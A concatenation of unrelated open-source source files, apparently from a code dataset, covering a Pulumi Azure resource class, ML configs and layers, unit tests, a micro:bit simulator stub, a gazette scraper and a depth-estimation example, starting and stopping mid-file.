raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ProductApiArgs.__new__(ProductApiArgs)
if api_management_name is None and not opts.urn:
raise TypeError("Missing required property 'api_management_name'")
__props__.__dict__["api_management_name"] = api_management_name
if api_name is None and not opts.urn:
raise TypeError("Missing required property 'api_name'")
__props__.__dict__["api_name"] = api_name
if product_id is None and not opts.urn:
raise TypeError("Missing required property 'product_id'")
__props__.__dict__["product_id"] = product_id
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
super(ProductApi, __self__).__init__(
'azure:apimanagement/productApi:ProductApi',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None) -> 'ProductApi':
"""
Get an existing ProductApi resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ProductApiState.__new__(_ProductApiState)
__props__.__dict__["api_management_name"] = api_management_name
__props__.__dict__["api_name"] = api_name
__props__.__dict__["product_id"] = product_id
__props__.__dict__["resource_group_name"] = resource_group_name
return ProductApi(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Output[str]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@property
@pulumi.getter(name="apiName")
def api_name(self) -> pulumi.Output[str]:
"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@property
@pulumi.getter(name="productId")
def product_id(self) -> pulumi.Output[str]:
"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "product_id")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
|
configs/flownet2/flownet2sd_8x1_slong_chairssdhom_384x448.py | hologerry/mmflow | 481 | 46232 | <reponame>hologerry/mmflow<filename>configs/flownet2/flownet2sd_8x1_slong_chairssdhom_384x448.py
_base_ = [
'../_base_/models/flownet2/flownet2sd.py',
'../_base_/datasets/chairssdhom_384x448.py',
'../_base_/schedules/schedule_s_long.py', '../_base_/default_runtime.py'
]
|
data_collection/gazette/spiders/sc_sao_domingos.py | kaiocp/querido-diario | 454 | 46289 | <reponame>kaiocp/querido-diario
from gazette.spiders.base.fecam import FecamGazetteSpider
class ScSaoDomingosSpider(FecamGazetteSpider):
name = "sc_sao_domingos"
FECAM_QUERY = "cod_entidade:244"
TERRITORY_ID = "4216107"
|
splearn/cluster/tests/test_k_means.py | dtrckd/sparkit-learn | 1,219 | 46310 | import numpy as np
from sklearn.cluster import KMeans
from splearn.cluster import SparkKMeans
from splearn.utils.testing import SplearnTestCase, assert_array_almost_equal
class TestKMeans(SplearnTestCase):
def test_same_centroids(self):
X, y, X_rdd = self.make_blobs(centers=4, n_samples=200000)
local = KMeans(n_clusters=4, init='k-means++', random_state=42)
dist = SparkKMeans(n_clusters=4, init='k-means++', random_state=42)
local.fit(X)
dist.fit(X_rdd)
local_centers = np.sort(local.cluster_centers_, axis=0)
dist_centers = np.sort(dist.cluster_centers_, axis=0)
assert_array_almost_equal(local_centers, dist_centers, decimal=4)
|
chrome/common/extensions/docs/server2/app_yaml_helper_test.py | iplo/Chain | 231 | 46368 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from app_yaml_helper import AppYamlHelper
from extensions_paths import SERVER2
from host_file_system_provider import HostFileSystemProvider
from mock_file_system import MockFileSystem
from object_store_creator import ObjectStoreCreator
from test_file_system import MoveTo, TestFileSystem
from test_util import DisableLogging
_ExtractVersion, _IsGreater, _GenerateAppYaml = (
AppYamlHelper.ExtractVersion,
AppYamlHelper.IsGreater,
AppYamlHelper.GenerateAppYaml)
class AppYamlHelperTest(unittest.TestCase):
def testExtractVersion(self):
def run_test(version):
self.assertEqual(version, _ExtractVersion(_GenerateAppYaml(version)))
run_test('0')
run_test('0-0')
run_test('0-0-0')
run_test('1')
run_test('1-0')
run_test('1-0-0')
run_test('1-0-1')
run_test('1-1-0')
run_test('1-1-1')
run_test('2-0-9')
run_test('2-0-12')
run_test('2-1')
run_test('2-1-0')
run_test('2-11-0')
run_test('3-1-0')
run_test('3-1-3')
run_test('3-12-0')
def testIsGreater(self):
def assert_is_greater(lhs, rhs):
self.assertTrue(_IsGreater(lhs, rhs), '%s is not > %s' % (lhs, rhs))
self.assertFalse(_IsGreater(rhs, lhs),
'%s should not be > %s' % (rhs, lhs))
assert_is_greater('0-0', '0')
assert_is_greater('0-0-0', '0')
assert_is_greater('0-0-0', '0-0')
assert_is_greater('1', '0')
assert_is_greater('1', '0-0')
assert_is_greater('1', '0-0-0')
assert_is_greater('1-0', '0-0')
assert_is_greater('1-0-0-0', '0-0-0')
assert_is_greater('2-0-12', '2-0-9')
assert_is_greater('2-0-12', '2-0-9-0')
assert_is_greater('2-0-12-0', '2-0-9')
assert_is_greater('2-0-12-0', '2-0-9-0')
assert_is_greater('2-1', '2-0-9')
assert_is_greater('2-1', '2-0-12')
assert_is_greater('2-1-0', '2-0-9')
assert_is_greater('2-1-0', '2-0-12')
assert_is_greater('3-1-0', '2-1')
assert_is_greater('3-1-0', '2-1-0')
assert_is_greater('3-1-0', '2-11-0')
assert_is_greater('3-1-3', '3-1-0')
assert_is_greater('3-12-0', '3-1-0')
assert_is_greater('3-12-0', '3-1-3')
assert_is_greater('3-12-0', '3-1-3-0')
@DisableLogging('warning')
def testInstanceMethods(self):
test_data = {
'app.yaml': _GenerateAppYaml('1-0'),
'app_yaml_helper.py': 'Copyright notice etc'
}
updates = []
# Pass a specific file system at head to the HostFileSystemProvider so that
# we know it's always going to be backed by a MockFileSystem. The Provider
# may decide to wrap it in caching etc.
file_system_at_head = MockFileSystem(
TestFileSystem(test_data, relative_to=SERVER2))
def apply_update(update):
update = MoveTo(SERVER2, update)
file_system_at_head.Update(update)
updates.append(update)
def host_file_system_constructor(branch, revision=None):
self.assertEqual('trunk', branch)
self.assertTrue(revision is not None)
return MockFileSystem.Create(
TestFileSystem(test_data, relative_to=SERVER2), updates[:revision])
object_store_creator = ObjectStoreCreator.ForTest()
host_file_system_provider = HostFileSystemProvider(
object_store_creator,
default_trunk_instance=file_system_at_head,
constructor_for_test=host_file_system_constructor)
helper = AppYamlHelper(object_store_creator, host_file_system_provider)
def assert_is_up_to_date(version):
self.assertTrue(helper.IsUpToDate(version),
'%s is not up to date' % version)
self.assertRaises(ValueError,
helper.GetFirstRevisionGreaterThan, version)
self.assertEqual(0, helper.GetFirstRevisionGreaterThan('0-5-0'))
assert_is_up_to_date('1-0-0')
assert_is_up_to_date('1-5-0')
# Revision 1.
apply_update({
'app.yaml': _GenerateAppYaml('1-5-0')
})
self.assertEqual(0, helper.GetFirstRevisionGreaterThan('0-5-0'))
self.assertEqual(1, helper.GetFirstRevisionGreaterThan('1-0-0'))
assert_is_up_to_date('1-5-0')
assert_is_up_to_date('2-5-0')
# Revision 2.
apply_update({
'app_yaml_helper.py': 'fixed a bug'
})
self.assertEqual(0, helper.GetFirstRevisionGreaterThan('0-5-0'))
self.assertEqual(1, helper.GetFirstRevisionGreaterThan('1-0-0'))
assert_is_up_to_date('1-5-0')
assert_is_up_to_date('2-5-0')
# Revision 3.
apply_update({
'app.yaml': _GenerateAppYaml('1-6-0')
})
self.assertEqual(0, helper.GetFirstRevisionGreaterThan('0-5-0'))
self.assertEqual(1, helper.GetFirstRevisionGreaterThan('1-0-0'))
self.assertEqual(3, helper.GetFirstRevisionGreaterThan('1-5-0'))
assert_is_up_to_date('2-5-0')
# Revision 4.
apply_update({
'app.yaml': _GenerateAppYaml('1-8-0')
})
# Revision 5.
apply_update({
'app.yaml': _GenerateAppYaml('2-0-0')
})
# Revision 6.
apply_update({
'app.yaml': _GenerateAppYaml('2-2-0')
})
# Revision 7.
apply_update({
'app.yaml': _GenerateAppYaml('2-4-0')
})
# Revision 8.
apply_update({
'app.yaml': _GenerateAppYaml('2-6-0')
})
self.assertEqual(0, helper.GetFirstRevisionGreaterThan('0-5-0'))
self.assertEqual(1, helper.GetFirstRevisionGreaterThan('1-0-0'))
self.assertEqual(3, helper.GetFirstRevisionGreaterThan('1-5-0'))
self.assertEqual(5, helper.GetFirstRevisionGreaterThan('1-8-0'))
self.assertEqual(6, helper.GetFirstRevisionGreaterThan('2-0-0'))
self.assertEqual(6, helper.GetFirstRevisionGreaterThan('2-1-0'))
self.assertEqual(7, helper.GetFirstRevisionGreaterThan('2-2-0'))
self.assertEqual(7, helper.GetFirstRevisionGreaterThan('2-3-0'))
self.assertEqual(8, helper.GetFirstRevisionGreaterThan('2-4-0'))
self.assertEqual(8, helper.GetFirstRevisionGreaterThan('2-5-0'))
assert_is_up_to_date('2-6-0')
assert_is_up_to_date('2-7-0')
if __name__ == '__main__':
unittest.main()
|
tf_quant_finance/rates/swap_curve_common.py | slowy07/tf-quant-finance | 3,138 | 46398 | <filename>tf_quant_finance/rates/swap_curve_common.py
# Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities and data structures for swap curve construction."""
from tf_quant_finance import types
from tf_quant_finance import utils
__all__ = [
'SwapCurveBuilderResult'
]
@utils.dataclass
class SwapCurveBuilderResult:
"""Swap curve calibration results.
Attributes:
times: Rank 1 real `Tensor`. Times for the computed rates.
rates: Rank 1 `Tensor` of the same dtype as `times`. The inferred zero
rates.
discount_factors: Rank 1 `Tensor` of the same dtype as `times`. The inferred
discount factors.
initial_rates: Rank 1 `Tensor` of the same dtype as `times`. The initial
guess for the rates.
converged: Scalar boolean `Tensor`. Whether the procedure converged.
failed: Scalar boolean `Tensor`. Whether the procedure failed.
iterations: Scalar int32 `Tensor`. Number of iterations performed.
objective_value: Scalar real `Tensor`. The objective function at the optimal
soultion.
"""
times: types.RealTensor
rates: types.RealTensor
discount_factors: types.RealTensor
initial_rates: types.RealTensor
converged: types.BoolTensor
failed: types.BoolTensor
iterations: types.IntTensor
objective_value: types.RealTensor
|
src/RobotFrameworkCore/org.robotframework.ide.core-functions/src/test/python/scripts/res_test_robot_session_server/a/lib.py | alex729/RED | 375 | 46401 | <filename>src/RobotFrameworkCore/org.robotframework.ide.core-functions/src/test/python/scripts/res_test_robot_session_server/a/lib.py<gh_stars>100-1000
def kw1():
pass |
mayan/apps/common/tests/test_classes.py | atitaya1412/Mayan-EDMS | 343 | 46431 | from django.db import models
from mayan.apps.testing.tests.base import BaseTestCase
from ..classes import QuerysetParametersSerializer
class QuerysetParametersSerializerTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self.TestModelParent = self._create_test_model(
model_name='TestModelParent'
)
self.TestModelChild = self._create_test_model(
fields={
'parent': models.ForeignKey(
on_delete=models.CASCADE, related_name='children',
to='TestModelParent'
)
}, model_name='TestModelChild'
)
self._test_object_parent = self.TestModelParent.objects.create()
self.TestModelChild.objects.create(parent_id=self._test_object_parent.pk)
def _assertQuerysetEqual(self):
rebuilt_items = list(map(repr, self.queryset_rebuilt))
self.assertQuerysetEqual(
qs=self.queryset_original, values=rebuilt_items
)
def test_without_kwargs(self):
self.queryset_original = self.TestModelParent.objects.all()
decomposed_queryset = QuerysetParametersSerializer.decompose(
_model=self.TestModelParent, _method_name='all'
)
self.queryset_rebuilt = QuerysetParametersSerializer.rebuild(
decomposed_queryset=decomposed_queryset
)
self._assertQuerysetEqual()
def test_foreign_key_model(self):
self.queryset_original = self.TestModelChild.objects.all()
decomposed_queryset = QuerysetParametersSerializer.decompose(
_model=self.TestModelChild, _method_name='filter',
parent=self._test_object_parent
)
self.queryset_rebuilt = QuerysetParametersSerializer.rebuild(
decomposed_queryset=decomposed_queryset
)
self._assertQuerysetEqual()
def test_foreign_key_model_id_query(self):
self.queryset_original = self.TestModelChild.objects.all()
decomposed_queryset = QuerysetParametersSerializer.decompose(
_model=self.TestModelChild, _method_name='filter',
parent_id=self._test_object_parent.pk
)
self.queryset_rebuilt = QuerysetParametersSerializer.rebuild(
decomposed_queryset=decomposed_queryset
)
self._assertQuerysetEqual()
|
service_catalog/tables/global_hook_tables.py | LaudateCorpus1/squest | 112 | 46434 | from django_tables2 import TemplateColumn
from service_catalog.models import GlobalHook
from Squest.utils.squest_table import SquestTable
class GlobalHookTable(SquestTable):
state = TemplateColumn(template_name='custom_columns/global_hook_state.html')
actions = TemplateColumn(template_name='custom_columns/global_hook_actions.html', orderable=False)
class Meta:
model = GlobalHook
attrs = {"id": "global_hook_table", "class": "table squest-pagination-tables"}
fields = ("name", "model", "state", "job_template", "actions")
|
src/micropython/microbit/__model/compass.py | julianrendell/vscode-python-devicesimulator | 151 | 46474 | <gh_stars>100-1000
from common import utils
from common.telemetry import telemetry_py
from common.telemetry_events import TelemetryEvent
class Compass:
# The implementation is based off of https://microbit-micropython.readthedocs.io/en/v1.0.1/compass.html.
def calibrate(self):
"""
This function is not implemented in the simulator.
Starts the calibration process. When this function is called on the physical device, an instructive message will be scrolled to the user after which they will need to rotate the device in order to draw a circle on the LED display on the actual device.
"""
utils.print_for_unimplemented_functions(Compass.calibrate.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def is_calibrated(self):
"""
This function is not implemented in the simulator.
Returns ``True`` if the compass has been successfully calibrated, and
returns ``False`` otherwise.
"""
utils.print_for_unimplemented_functions(Compass.is_calibrated.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def clear_calibration(self):
"""
This function is not implemented in the simulator.
Undoes the calibration, making the compass uncalibrated again.
"""
utils.print_for_unimplemented_functions(Compass.clear_calibration.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def get_x(self):
"""
This function is not implemented in the simulator.
Gives the reading of the magnetic field strength on the ``x`` axis in nano
tesla, as a positive or negative integer, depending on the direction of the
field.
"""
utils.print_for_unimplemented_functions(Compass.get_x.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def get_y(self):
"""
This function is not implemented in the simulator.
Gives the reading of the magnetic field strength on the ``y`` axis in nano
tesla, as a positive or negative integer, depending on the direction of the
field.
"""
utils.print_for_unimplemented_functions(Compass.get_y.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def get_z(self):
"""
This function is not implemented in the simulator.
Gives the reading of the magnetic field strength on the ``z`` axis in nano
tesla, as a positive or negative integer, depending on the direction of the
field.
"""
utils.print_for_unimplemented_functions(Compass.get_z.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def heading(self):
"""
This function is not implemented in the simulator.
Gives the compass heading, calculated from the above readings, as an
integer in the range from 0 to 360, representing the angle in degrees,
clockwise, with north as 0.
"""
utils.print_for_unimplemented_functions(Compass.heading.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def get_field_strength(self):
"""
This function is not implemented in the simulator.
Returns an integer indication of the magnitude of the magnetic field around
the device in nano tesla.
"""
utils.print_for_unimplemented_functions(Compass.get_field_strength.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
|
library/test/test_compiler/sbs_code_tests/95_annotation_global.py | creativemindplus/skybison | 278 | 46518 | # Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
def f():
(some_global): int
print(some_global)
# EXPECTED:
[
...,
LOAD_CONST(Code((1, 0))),
LOAD_CONST('f'),
MAKE_FUNCTION(0),
STORE_NAME('f'),
LOAD_CONST(None),
RETURN_VALUE(0),
CODE_START('f'),
~LOAD_CONST('int'),
]
|
python/examples/depthnet.py | jwkim386/Jetson_Inference | 5,788 | 46531 | <gh_stars>1000+
#!/usr/bin/python3
#
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
import jetson.inference
import jetson.utils
import argparse
import sys
from depthnet_utils import depthBuffers
# parse the command line
parser = argparse.ArgumentParser(description="Mono depth estimation on a video/image stream using depthNet DNN.",
formatter_class=argparse.RawTextHelpFormatter, epilog=jetson.inference.depthNet.Usage() +
jetson.utils.videoSource.Usage() + jetson.utils.videoOutput.Usage() + jetson.utils.logUsage())
parser.add_argument("input_URI", type=str, default="", nargs='?', help="URI of the input stream")
parser.add_argument("output_URI", type=str, default="", nargs='?', help="URI of the output stream")
parser.add_argument("--network", type=str, default="fcn-mobilenet", help="pre-trained model to load, see below for options")
parser.add_argument("--visualize", type=str, default="input,depth", help="visualization options (can be 'input' 'depth' 'input,depth'")
parser.add_argument("--depth-size", type=float, default=1.0, help="scales the size of the depth map visualization, as a percentage of the input size (default is 1.0)")
parser.add_argument("--filter-mode", type=str, default="linear", choices=["point", "linear"], help="filtering mode used during visualization, options are:\n 'point' or 'linear' (default: 'linear')")
parser.add_argument("--colormap", type=str, default="viridis-inverted", help="colormap to use for visualization (default is 'viridis-inverted')",
choices=["inferno", "inferno-inverted", "magma", "magma-inverted", "parula", "parula-inverted",
"plasma", "plasma-inverted", "turbo", "turbo-inverted", "viridis", "viridis-inverted"])
try:
opt = parser.parse_known_args()[0]
except:
print("")
parser.print_help()
sys.exit(0)
# load the segmentation network
net = jetson.inference.depthNet(opt.network, sys.argv)
# create buffer manager
buffers = depthBuffers(opt)
# create video sources & outputs
input = jetson.utils.videoSource(opt.input_URI, argv=sys.argv)
output = jetson.utils.videoOutput(opt.output_URI, argv=sys.argv)
# process frames until user exits
while True:
# capture the next image
img_input = input.Capture()
# allocate buffers for this size image
buffers.Alloc(img_input.shape, img_input.format)
# process the mono depth and visualize
net.Process(img_input, buffers.depth, opt.colormap, opt.filter_mode)
# composite the images
if buffers.use_input:
jetson.utils.cudaOverlay(img_input, buffers.composite, 0, 0)
if buffers.use_depth:
jetson.utils.cudaOverlay(buffers.depth, buffers.composite, img_input.width if buffers.use_input else 0, 0)
# render the output image
output.Render(buffers.composite)
# update the title bar
output.SetStatus("{:s} | {:s} | Network {:.0f} FPS".format(opt.network, net.GetNetworkName(), net.GetNetworkFPS()))
# print out performance info
jetson.utils.cudaDeviceSynchronize()
net.PrintProfilerTimes()
# exit on input/output EOS
if not input.IsStreaming() or not output.IsStreaming():
break
|
misc/kwcheck.py | zzahti/skytools | 116 | 46532 | <reponame>zzahti/skytools
#! /usr/bin/env python
import sys
import re
import pkgloader
pkgloader.require('skytools', '3.0')
import skytools.quoting
kwmap = skytools.quoting._ident_kwmap
fn = "/opt/src/pgsql/postgresql/src/include/parser/kwlist.h"
if len(sys.argv) == 2:
fn = sys.argv[1]
rc = re.compile(r'PG_KEYWORD[(]"(.*)" , \s* \w+ , \s* (\w+) [)]', re.X)
data = open(fn, 'r').read()
full_map = {}
cur_map = {}
print "== new =="
for kw, cat in rc.findall(data):
full_map[kw] = 1
if cat == 'UNRESERVED_KEYWORD':
continue
if cat == 'COL_NAME_KEYWORD':
continue
cur_map[kw] = 1
if kw not in kwmap:
print kw, cat
kwmap[kw] = 1
print "== obsolete =="
kws = kwmap.keys()
kws.sort()
for k in kws:
if k not in full_map:
print k, '(not in full_map)'
elif k not in cur_map:
print k, '(not in cur_map)'
print "== full list =="
ln = ""
for k in kws:
ln += '"%s":1, ' % k
if len(ln) > 70:
print ln.strip()
ln = ""
print ln.strip()
|
tests/run_on_large_dataset.py | ur-whitelab/selfies | 367 | 46537 | """Script for testing selfies against large datasets.
"""
import argparse
import pathlib
import pandas as pd
from rdkit import Chem
from tqdm import tqdm
import selfies as sf
parser = argparse.ArgumentParser()
parser.add_argument("--data_path", type=str, default="version.smi.gz")
parser.add_argument("--col_name", type=str, default="isosmiles")
parser.add_argument("--sep", type=str, default=r"\s+")
parser.add_argument("--start_from", type=int, default=0)
args = parser.parse_args()
TEST_DIR = pathlib.Path(__file__).parent
TEST_SET_PATH = TEST_DIR / "test_sets" / args.data_path
ERROR_LOG_DIR = TEST_DIR / "error_logs"
ERROR_LOG_DIR.mkdir(exist_ok=True, parents=True)
def make_reader():
return pd.read_csv(TEST_SET_PATH, sep=args.sep, chunksize=10000)
def roundtrip_translation():
sf.set_semantic_constraints("hypervalent")
n_entries = 0
for chunk in make_reader():
n_entries += len(chunk)
pbar = tqdm(total=n_entries)
reader = make_reader()
error_log = open(ERROR_LOG_DIR / f"{TEST_SET_PATH.stem}.txt", "a+")
curr_idx = 0
for chunk_idx, chunk in enumerate(reader):
for in_smiles in chunk[args.col_name]:
pbar.update(1)
curr_idx += 1
if curr_idx < args.start_from:
continue
in_smiles = in_smiles.strip()
mol = Chem.MolFromSmiles(in_smiles, sanitize=True)
if (mol is None) or ("*" in in_smiles):
continue
try:
selfies = sf.encoder(in_smiles, strict=True)
out_smiles = sf.decoder(selfies)
except (sf.EncoderError, sf.DecoderError):
error_log.write(in_smiles + "\n")
tqdm.write(in_smiles)
continue
if not is_same_mol(in_smiles, out_smiles):
error_log.write(in_smiles + "\n")
tqdm.write(in_smiles)
error_log.close()
def is_same_mol(smiles1, smiles2):
try:
can_smiles1 = Chem.CanonSmiles(smiles1)
can_smiles2 = Chem.CanonSmiles(smiles2)
return can_smiles1 == can_smiles2
except Exception:
return False
if __name__ == "__main__":
roundtrip_translation()
|
chainer_chemistry/links/readout/set2set.py | pfnet/chainerchem | 184 | 46540 | from typing import List, Optional # NOQA
import chainer
from chainer import cuda
from chainer import functions
from chainer import links
import numpy # NOQA
class Set2Set(chainer.Chain):
r"""MPNN subsubmodule for readout part.
See: <NAME>+, \
Order Matters: Sequence to sequence for sets. November 2015.
`arXiv:1511.06391 <https://arxiv.org/abs/1511.06391>`
Args:
in_channels (int): dimension of input feature vector
n_layers (int): number of LSTM layers
Returns (chainer.Variable):
Output feature vector: (minibatch, in_channels * 2)
"""
def __init__(self, in_channels, n_layers=1):
# type: (int, int) -> None
super(Set2Set, self).__init__()
with self.init_scope():
self.lstm_layer = links.NStepLSTM(
n_layers=n_layers,
in_size=in_channels * 2,
out_size=in_channels,
dropout=0)
self.in_channels = in_channels
self.n_layers = n_layers
self.hx = None # type: Optional[chainer.Variable]
self.cx = None # type: Optional[chainer.Variable]
self.q_star = None # type: Optional[List]
def __call__(self, h):
# type: (chainer.Variable) -> chainer.Variable
xp = cuda.get_array_module(h)
mb, node, ch = h.shape # type: int, int, int
if self.q_star is None:
self.q_star = [
xp.zeros((1, self.in_channels * 2)).astype('f')
for _ in range(mb)
]
self.hx, self.cx, q = self.lstm_layer(self.hx, self.cx, self.q_star)
# self.hx: (mb, mb, ch)
# self.cx: (mb, mb, ch)
# q: List[(1, ch) * mb]
q = functions.stack(q) # q: (mb, 1, ch)
q_ = functions.transpose(q, axes=(0, 2, 1)) # q_: (mb, ch, 1)
e = functions.matmul(h, q_) # e: (mb, node, 1)
a = functions.softmax(e) # a: (mb, node, 1)
a = functions.broadcast_to(a, h.shape) # a: (mb, node, ch)
r = functions.sum((a * h), axis=1, keepdims=True) # r: (mb, 1, ch)
q_star_ = functions.concat((q, r), axis=2) # q_star_: (mb, 1, ch*2)
self.q_star = functions.separate(q_star_)
return functions.reshape(q_star_, (mb, ch * 2))
def reset_state(self):
# type: () -> None
self.hx = None
self.cx = None
self.q_star = None
|
binding.gyp | dimshik100/Epoc.js | 799 | 46558 | <gh_stars>100-1000
{
"targets": [
{
"target_name": "index",
"sources": [ "epoc.cc"],
"include_dirs" : [
"<!(node -e \"require('nan')\")"
],
"conditions": [
['OS=="mac"', {
"cflags": [ "-m64" ],
"ldflags": [ "-m64" ],
"xcode_settings": {
"OTHER_CFLAGS": ["-ObjC++"],
"ARCHS": [ "x86_64" ]
},
"link_settings": {
"libraries": [
"/Library/Frameworks/edk.framework/edk"
],
"include_dirs": ["./lib/includes/", "./lib/"]
}
}]
]
}
]
}
|
SimCalorimetry/HcalZeroSuppressionProducers/python/NoHcalZeroSuppression_cff.py | ckamtsikis/cmssw | 852 | 46571 | <filename>SimCalorimetry/HcalZeroSuppressionProducers/python/NoHcalZeroSuppression_cff.py
# Fragment to switch off HCAL zero suppression as an option
# by cmsDriver customisation
# to generate Unsuppressed digis, one has to set the following parameter:
# process.simHcalDigis.useConfigZSvalues = 1
# to generate suppressed digis, useConfigZSvalues should be set to 0
import FWCore.ParameterSet.Config as cms
def customise(process):
# process.hcalDigiSequence.replace(process.simHcalDigis,cms.SequencePlaceholder("simHcalDigis"))
# process.load("SimCalorimetry.HcalZeroSuppressionProducers.hcalDigisNoSuppression_cfi")
process.simHcalDigis.HBlevel = -999
process.simHcalDigis.HElevel = -999
process.simHcalDigis.HOlevel = -999
process.simHcalDigis.HFlevel = -999
process.simHcalDigis.useConfigZSvalues = 1
return(process)
|
py/testdir_single_jvm/test_failswith512chunk.py | gigliovale/h2o | 882 | 46575 | <reponame>gigliovale/h2o<gh_stars>100-1000
import unittest, time, sys
# not needed, but in case you move it down to subdir
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_import as h2i
import h2o_browse as h2b
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
h2o.init()
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_fail1_100x1100(self):
parseResult = h2i.import_parse(bucket='smalldata', path='fail1_100x11000.csv.gz', schema='put',
timeoutSecs=60, retryDelaySecs=0.15)
if __name__ == '__main__':
h2o.unit_main()
|
running_modes/configurations/reinforcement_learning/reinforcement_learning_components.py | lilleswing/Reinvent-1 | 183 | 46579 | from dataclasses import dataclass
from reinvent_scoring.scoring.diversity_filters.reinvent_core.diversity_filter_parameters import \
DiversityFilterParameters
from reinvent_scoring.scoring.scoring_function_parameters import ScoringFunctionParameters
from running_modes.configurations.reinforcement_learning.inception_configuration import InceptionConfiguration
from running_modes.configurations.reinforcement_learning.reinforcement_learning_configuration import \
ReinforcementLearningConfiguration
@dataclass
class ReinforcementLearningComponents:
"""This class holds the necessary configuration components to run RL"""
reinforcement_learning: ReinforcementLearningConfiguration
scoring_function: ScoringFunctionParameters
diversity_filter: DiversityFilterParameters
inception: InceptionConfiguration
|
examples/how_to/per_round_max_channel.py | haoxusci/starfish | 164 | 46650 | <reponame>haoxusci/starfish<filename>examples/how_to/per_round_max_channel.py
"""
.. _howto_perroundmaxchannel:
Decoding Spots with :py:class:`.PerRoundMaxChannel`
===================================================
:py:class:`.PerRoundMaxChannel` is a :py:class:`.DecodeSpotsAlgorithm` that picks the channel with
maximum signal intensity for each round to construct a barcode and then matches the barcode to
:term:`codewords <Codeword>` in the :term:`codebook <Codebook>`. It is important to
:ref:`normalize<section_normalizing_intensities>` the images prior to
:py:class:`.PerRoundMaxChannel` if the channels have significant differences in range of
intensity values. The returned :py:class:`.DecodedIntensityTable` has a ``distance`` field that
is a decoding quality score. :term:`Spots traces <Feature (Spot, Pixel) Trace>` with higher signal
in non-max channels have a greater ``distance`` value reflecting lower confidence in the decoded
:term:`target <Target>`.
:py:class:`.PerRoundMaxChannel` can be used for linearly multiplexed and one hot multiplexed
:term:`codebooks <Codebook>`. Linearly multiplexed assays (e.g. osmFISH, sequential
smFISH, and RNAscope) can be decoded with :py:class:`.PerRoundMaxChannel` by setting
``trace_building_strategy=TraceBuildingStrategies.SEQUENTIAL``. One hot multiplexed assays (e.g.
in situ sequencing, seqFISH, and STARmap) are termed 'one hot' because every round has exactly one
